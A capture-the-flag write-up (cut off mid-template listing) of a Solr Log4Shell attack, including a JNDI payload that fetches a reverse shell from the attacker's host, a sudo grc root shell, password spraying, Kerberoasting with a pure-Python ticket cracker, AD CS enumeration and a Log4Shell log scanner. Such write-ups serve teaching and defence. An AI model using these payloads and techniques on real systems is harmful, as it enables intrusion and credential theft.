Certify Writeup

External reconnaissance

The target turns out to be an Apache Solr instance (port 8983).

Solr bundles Log4j 2 for its own logging, so an unpatched instance is a candidate for the Log4j 2 JNDI RCE (Log4Shell, CVE-2021-44228). The Solr advisory lists 7.4.0 through 8.11.0 as affected, so check the version shown in the admin UI before spending time on it.

Log4j 2 RCE

Start an LDAP server first. JNDIExploit serves the LDAP reference on 1389 and the class payload over HTTP on the port given with -p:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsaddress -p port

Reverse shell

The Collections API handler logs the value of the action parameter through Log4j, so a lookup string placed there is evaluated by the server:

GET /solr/admin/collections?action=${jndi:ldap://vpsaddress:1389/Basic/ReverseShell/vpsaddress/port} HTTP/1.1
Host: 39.99.154.173:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
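As an added example (not part of the original writeup), here is the detection side of the request above: a small Python scanner that undoes Log4j's nested-lookup obfuscation before matching, so that `${${lower:j}ndi:...}` and `${::-j}` variants are caught alongside the plain payload. The log lines are constructed for the example in Apache combined format, with 203.0.113.10 standing in for the attacker's VPS; they are not traffic from the lab.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in HTTP access-log lines.

Log4j's StrSubstitutor resolves nested ${...} lookups from the inside out, so
attackers hide "${jndi:" behind ${lower:j}, ${::-j}, ${env:NOPE:-j} and similar
tricks. We apply the same resolution rules before matching. SAMPLE_LOG below is
CONSTRUCTED for this example; it is not captured traffic.
"""
import re
from urllib.parse import unquote

_INNER = re.compile(r"\$\{([^${}]*)\}")  # innermost lookup: no nested braces inside
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9]+)\s*:", re.IGNORECASE)


def _resolve(token: str):
    """Collapse one innermost lookup the way Log4j 2.x would; None if terminal/unknown.

    ${jndi:...}  -> None (terminal: this is what we want to surface)
    ${x:-d}      -> d   (default-value syntax; x may be empty or a bogus lookup)
    ${lower:X}   -> x,  ${upper:x} -> X
    """
    prefix, _, arg = token.partition(":")
    if prefix.lower() == "jndi":
        return None
    if ":-" in token:
        return token.split(":-", 1)[1]
    if prefix.lower() == "lower":
        return arg.lower()
    if prefix.lower() == "upper":
        return arg.upper()
    return None


def normalize(s: str, max_rounds: int = 32) -> str:
    """URL-decode, then repeatedly resolve innermost lookups until nothing changes."""
    s = unquote(s)
    for _ in range(max_rounds):
        changed = False

        def _sub(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = _INNER.sub(_sub, s)
        if not changed:
            break
    return s


def scan_log(lines):
    """Return (line_number, jndi_scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# CONSTRUCTED sample: the writeup's Solr request as a server would log it (URL-encoded),
# an obfuscated variant smuggled in the User-Agent, and a benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Mar/2025:13:20:43 +0800] "GET /solr/admin/collections?action=$%7Bjndi:ldap://203.0.113.10:1389/Basic/ReverseShell/203.0.113.10/4444%7D HTTP/1.1" 500 - "-" "Mozilla/5.0"',
    '10.0.0.6 - - [11/Mar/2025:13:21:02 +0800] "GET /solr/ HTTP/1.1" 200 16555 "-" "${${lower:j}${::-n}${env:NOPE:-d}i:${lower:L}DAP://203.0.113.10:1389/a}"',
    '10.0.0.7 - - [11/Mar/2025:13:21:10 +0800] "GET /solr/admin/collections?action=LIST HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme}")
```

Run it against a real access log with `scan_log(open(path))`; the scheme it returns (ldap, rmi, dns, ...) tells you whether the probe was a blind callback check or an attempt to load a remote class.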

Privilege escalation via grc

The solr user is allowed to run grc through sudo. grc is listed on GTFOBins: its --pty option runs the given command inside a pseudo-terminal, so it will happily spawn a root shell:

sudo grc --pty /bin/sh

Internal network penetration

Internal reconnaissance

Running fscan from the Solr host against its /24 (the ICMP probe falls back to ping because the solr user cannot open raw sockets):

solr@ubuntu:/tmp$ ./fscan -h  172.22.9.1/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-03-11 13:20:43] [INFO] Brute-force threads: 1
[2025-03-11 13:20:43] [INFO] Starting information scan
[2025-03-11 13:20:43] [INFO] CIDR range: 172.22.9.0-172.22.9.255
[2025-03-11 13:20:43] [INFO] Generated IP range: 172.22.9.0.%!d(string=172.22.9.255) - %!s(MISSING).%!d(MISSING)
[2025-03-11 13:20:43] [INFO] Parsed CIDR 172.22.9.1/24 -> IP range 172.22.9.0-172.22.9.255
[2025-03-11 13:20:43] [INFO] Final valid host count: 256
[2025-03-11 13:20:43] [INFO] Starting host scan
[2025-03-11 13:20:43] [INFO] Trying ICMP probe without a listener...
[2025-03-11 13:20:43] [INFO] Current user lacks the privilege to send raw ICMP packets
[2025-03-11 13:20:43] [INFO] Falling back to ping-based probing...
[2025-03-11 13:20:43] [SUCCESS] Target 172.22.9.7 is alive (ICMP)
[2025-03-11 13:20:43] [SUCCESS] Target 172.22.9.26 is alive (ICMP)
[2025-03-11 13:20:43] [SUCCESS] Target 172.22.9.47 is alive (ICMP)
[2025-03-11 13:20:43] [SUCCESS] Target 172.22.9.19 is alive (ICMP)
[2025-03-11 13:20:49] [INFO] Alive hosts: 4
[2025-03-11 13:20:49] [INFO] Valid ports: 233
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.19:80
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.19:22
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.26:135
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.7:135
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.47:22
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.47:21
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.47:80
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.7:88
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.47:445
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.26:445
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.7:445
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.7:389
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.26:139
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.47:139
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.7:139
[2025-03-11 13:20:49] [SUCCESS] Open port 172.22.9.7:80
[2025-03-11 13:20:49] [SUCCESS] Service detected 172.22.9.19:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.5 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-11 13:20:50] [SUCCESS] Service detected 172.22.9.47:22 => [ssh] version:7.6p1 Ubuntu 4ubuntu0.7 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-03-11 13:20:50] [SUCCESS] Service detected 172.22.9.47:21 => [ftp] version:3.0.3 product:vsftpd os:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-11 13:20:50] [SUCCESS] Open port 172.22.9.19:8983
[2025-03-11 13:20:54] [SUCCESS] Service detected 172.22.9.19:80 => [http] version:1.18.0 product:nginx os:Linux info:Ubuntu
[2025-03-11 13:20:55] [SUCCESS] Service detected 172.22.9.7:88 =>
[2025-03-11 13:20:55] [SUCCESS] Service detected 172.22.9.26:445 =>
[2025-03-11 13:20:55] [SUCCESS] Service detected 172.22.9.47:80 => [http]
[2025-03-11 13:20:55] [SUCCESS] Service detected 172.22.9.7:445 =>
[2025-03-11 13:20:55] [SUCCESS] Service detected 172.22.9.7:389 =>
[2025-03-11 13:20:55] [SUCCESS] Service detected 172.22.9.26:139 => Banner:[.]
[2025-03-11 13:20:55] [SUCCESS] Service detected 172.22.9.7:139 => Banner:[.]
[2025-03-11 13:20:55] [SUCCESS] Service detected 172.22.9.7:80 => [http]
[2025-03-11 13:21:00] [SUCCESS] Service detected 172.22.9.19:8983 => [http] product:Apache Solr Banner:[HTTP/1.1 302 Found.Location: http://172.22.9.19:8983/solr/.]
[2025-03-11 13:21:50] [SUCCESS] Service detected 172.22.9.47:445 =>
[2025-03-11 13:21:50] [SUCCESS] Service detected 172.22.9.47:139 =>
[2025-03-11 13:21:54] [SUCCESS] Service detected 172.22.9.26:135 =>
[2025-03-11 13:21:54] [SUCCESS] Service detected 172.22.9.7:135 =>
[2025-03-11 13:21:55] [INFO] Open ports: 17
[2025-03-11 13:21:55] [INFO] Starting vulnerability scan
[2025-03-11 13:21:55] [INFO] Loaded plugins: findnet, ftp, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-11 13:21:55] [SUCCESS] Web title http://172.22.9.19 status:200 length:612 title:Welcome to nginx!
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.7 DC:XIAORANG\XIAORANG-DC
[2025-03-11 13:21:55] [SUCCESS] Web title http://172.22.9.47 status:200 length:10918 title:Apache2 Ubuntu Default Page: It works
[2025-03-11 13:21:55] [SUCCESS] Web title http://172.22.9.7 status:200 length:703 title:IIS Windows Server
[2025-03-11 13:21:55] [SUCCESS] NetInfo scan result
Target host: 172.22.9.7
Hostname: XIAORANG-DC
Discovered network interfaces:
IPv4 addresses:
└─ 172.22.9.7
[2025-03-11 13:21:55] [SUCCESS] NetInfo scan result
Target host: 172.22.9.26
Hostname: DESKTOP-CBKTVMO
Discovered network interfaces:
IPv4 addresses:
└─ 172.22.9.26
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-03-11 13:21:55] [INFO] System info 172.22.9.47 [Windows 6.1]
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.47 fileserver Windows 6.1
[2025-03-11 13:21:55] [SUCCESS] SMB authentication succeeded 172.22.9.47:445 administrator:123456
[2025-03-11 13:21:55] [INFO] SMB2 share info 172.22.9.47:445 administrator Pass:123456 shares:[print$ fileshare IPC$]
[2025-03-11 13:21:55] [SUCCESS] Target: http://172.22.9.7:80
Vuln type: poc-yaml-active-directory-certsrv-detect
Vuln name:
Details:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-03-11 13:21:55] [SUCCESS] Web title http://172.22.9.19:8983 status:302 length:0 title:(none) redirect: http://172.22.9.19:8983/solr/
[2025-03-11 13:21:56] [SUCCESS] Web title http://172.22.9.19:8983/solr/ status:200 length:16555 title:Solr Admin

Weak SMB credentials

What the scan tells us: 172.22.9.7 is the domain controller XIAORANG-DC (Kerberos on 88, LDAP on 389, and IIS on 80 where the certsrv check fired, so AD CS runs on the DC); 172.22.9.26 is DESKTOP-CBKTVMO, a Windows Server 2016 member; 172.22.9.47 "fileserver" is a Linux box running Samba, vsftpd and Apache (fscan prints the "Windows 6.1" string that Samba advertises, but the SSH banner says Ubuntu); 172.22.9.19 is the Solr host we already control.

fscan's built-in weak-password check logged into the file server as administrator:123456. This is a weak credential, not anonymous access: SMB authentication succeeded 172.22.9.47:445 administrator:123456

flag01

The share leaks a sensitive database export.

After downloading it, it turns out to contain entries of the form xxxx@xiaorang.lab.

Kerberos AS-REQ domain user enumeration

The @xiaorang.lab suffix immediately suggests enumerating domain users.

During the AS-REQ stage of Kerberos the KDC answers differently depending on the cname: for a principal that does not exist it returns KDC_ERR_C_PRINCIPAL_UNKNOWN (error code 6), while for an existing principal it returns KDC_ERR_PREAUTH_REQUIRED (25) when no pre-authentication is supplied, and an AS-REP or KDC_ERR_PREAUTH_FAILED (24) depending on whether the password is right. Because the "does not exist" case is distinguishable without any credentials, valid usernames can be enumerated with nothing but access to port 88. kerbrute does exactly this; since userenum never sends a password the probes do not increment badPwdCount, though each one leaves an event ID 4768 entry on the DC.

./kerbrute_linux_amd64 userenum --dc 172.22.9.7 -d xiaorang.lab 1.txt

A password list was found in the same dump.

Password spraying

Spray each candidate password across the confirmed users. Unlike userenum, a spray is a real pre-authentication attempt, so every failure counts against the account lockout threshold; check the domain's lockout policy (or stay at one password per observation window) before running more than a couple of rounds.

./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt i9XDE02pLVf
./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt 6N70jt2K9sV
./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt fiAzGwEMgTY

None of the sprayed accounts can RDP in, though. The challenge hint mentions SPNs, so the next step is to look for them.

SPN: Service Principal Names

An SPN (Service Principal Name) is the unique identifier of a service instance (HTTP, SMB, MSSQL and so on) on a network that uses Kerberos authentication; it consists of a service class, a host name and optionally a port.
SPNs come in two kinds. One is registered on machine accounts (Computers): when a service runs as Local System or Network Service, its SPN is registered on the computer account. The other is registered on domain user accounts (Users): when a service runs under a domain user, the SPN is registered on that user. The second kind is what matters for Kerberoasting: any authenticated domain user can request a service ticket for such an SPN, and the ticket is encrypted with the service account's key (derived from its password), so it can be cracked offline.

GetUserSPNs.py lists the SPNs registered on user accounts, and with -request-user it also requests the service ticket:

┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>




┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request-user chenchen
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>



[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$65c2333af3fa46c6bd1b0de8ca6ce5b4$...

┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>




┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY -request-user chenchen
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>



[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$72477e422a439a3804793b75737a89ae$...

Requesting the service ticket (ST)

proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request-user chenchen

The $krb5tgs$23$ prefix means the KDC issued the ticket with etype 23 (RC4-HMAC), the weakest type and the one hashcat cracks fastest; had the service account been restricted to AES you would see $krb5tgs$17$ or $krb5tgs$18$ and a far slower crack.

Hash cracking

hashcat -m 13100 -a 0 '/home/hey/Desktop/2.txt' '/home/hey/Desktop/rockyou.txt' --force
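To make clear what hashcat mode 13100 actually tests per candidate, here is an added example (not from the writeup and not hashcat's code) that re-implements the RC4-HMAC check in pure Python: derive K1 from the candidate's NT hash and key usage 2, derive K3 from the checksum, RC4-decrypt edata2, and compare the recomputed HMAC-MD5 with the checksum. Because the chenchen ticket body is not reproduced above, the block constructs its own `$krb5tgs$23$` line by encrypting a dummy ticket under an assumed password (Summer2023!) and then cracks it with a three-word list. MD4 is implemented by hand because OpenSSL 3 builds of Python often disable it.

```python
"""Offline check of a Kerberoast hash ($krb5tgs$23$, RC4-HMAC) against a wordlist.

Dependency-free re-implementation of the per-candidate test hashcat mode 13100
performs (RFC 4757). The hash it cracks is CONSTRUCTED by make_sample_hash()
under an assumed password; the chenchen ticket from the writeup is not used.
"""
from __future__ import annotations
import hmac
import os
import struct
from hashlib import md5

_M = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) by hand: OpenSSL 3 builds of hashlib often disable it."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & _M
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1, F(b,c,d) = (b & c) | (~b & d)
            a = rot((a + ((b & c) | (~b & d)) + x[i]) & _M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, G = majority(b,c,d), column-wise word order
            k = (i % 4) * 4 + i // 4
            a = rot((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & _M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, H = b ^ c ^ d
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rot((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & _M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(u + v) & _M for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

USAGE_TGS_REP_TICKET = 2  # RFC 4120 key-usage number for a ticket's enc-part

def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = USAGE_TGS_REP_TICKET) -> tuple[bytes, bytes]:
    """RFC 4757 encrypt; returns (checksum, edata2), the two hex fields of $krb5tgs$23$."""
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    data = os.urandom(8) + plaintext  # 8-byte random confounder
    checksum = hmac.new(k1, data, md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return checksum, rc4(k3, data)

def rc4_hmac_verify(key: bytes, checksum: bytes, edata2: bytes, usage: int = USAGE_TGS_REP_TICKET) -> bool:
    """The per-candidate test: derive K1 and K3, decrypt, recompute the MAC, compare."""
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return hmac.compare_digest(hmac.new(k1, rc4(k3, edata2), md5).digest(), checksum)

def parse_krb5tgs23(line: str) -> tuple[str, bytes, bytes]:
    """'$krb5tgs$23$*user$REALM$spn*$checksum$edata2' -> (label, checksum, edata2)."""
    prefix = "$krb5tgs$23$*"
    if not line.startswith(prefix):
        raise ValueError("not an etype-23 Kerberoast hash")
    label = line[len(prefix):line.rindex("*")]
    checksum, edata2 = line.rsplit("$", 2)[1:]
    return label, bytes.fromhex(checksum), bytes.fromhex(edata2)

def crack(line: str, wordlist) -> str | None:
    """Return the first wordlist entry whose NT hash verifies the ticket, else None."""
    _, checksum, edata2 = parse_krb5tgs23(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), checksum, edata2):
            return candidate
    return None

def make_sample_hash(password: str, label: str = "chenchen$XIAORANG.LAB$xiaorang.lab/chenchen") -> str:
    """CONSTRUCTED hash line: a dummy ticket body encrypted under `password`."""
    checksum, edata2 = rc4_hmac_encrypt(nt_hash(password), b"EncTicketPart placeholder " * 4)
    return f"$krb5tgs$23$*{label}*${checksum.hex()}${edata2.hex()}"

if __name__ == "__main__":
    sample = make_sample_hash("Summer2023!")  # assumed password, for the demo only
    print("cracked:", crack(sample, ["123456", "Password1", "Summer2023!"]))
```

Two things the block makes visible: the cost per guess is one MD4 plus three HMAC-MD5 and one RC4, which is why etype 23 tickets fall so quickly on a GPU, and the only secret involved is the service account's password, so a long random password (or a group managed service account) is the fix, not hiding the SPN.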

Rdp

Domain penetration

Domain reconnaissance

Internal recon earlier produced the active-directory-certsrv-detect hit on http://172.22.9.7:80, the DC itself, so AD CS is installed on XIAORANG-DC.

AD CS (Active Directory Certificate Services) is the Windows Server role that builds and manages a public key infrastructure (PKI): creating, issuing, storing and revoking digital certificates. Because a certificate issued to a user can be used for Kerberos logon (PKINIT), a misconfigured template turns the CA into an authentication bypass, which is exactly what the ESC family of attacks exploits.

AD CS

proxychains certipy find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

The same enumeration was also run from the chenchen RDP session with Certify. Certify.exe takes /vulnerable-style switches and does not recognise Certipy's -u/-password/-dc-ip flags, so the flags below had no effect and it printed every template rather than only the vulnerable one. The full list is still useful: the flags that make "XR Manager" dangerous stand out when set beside the stock templates.

C:\Users\chenchen\Desktop\hvv>Certify.exe find -u 'liupeng@xiaorang.lab'  -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'

Enterprise CA Name : xiaorang-XIAORANG-DC-CA
DNS Hostname : XIAORANG-DC.xiaorang.lab
FullName : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Cert Thumbprint : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
Cert Serial : 43A73F4A37050EAA4E29C0D95BC84BB5
Cert Start Date : 2023/7/14 12:33:21
Cert End Date : 2028/7/14 12:43:21
Cert Chain : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
Allow ManageCA, ManageCertificates XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Secure Email, Encrypting File System, Client Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
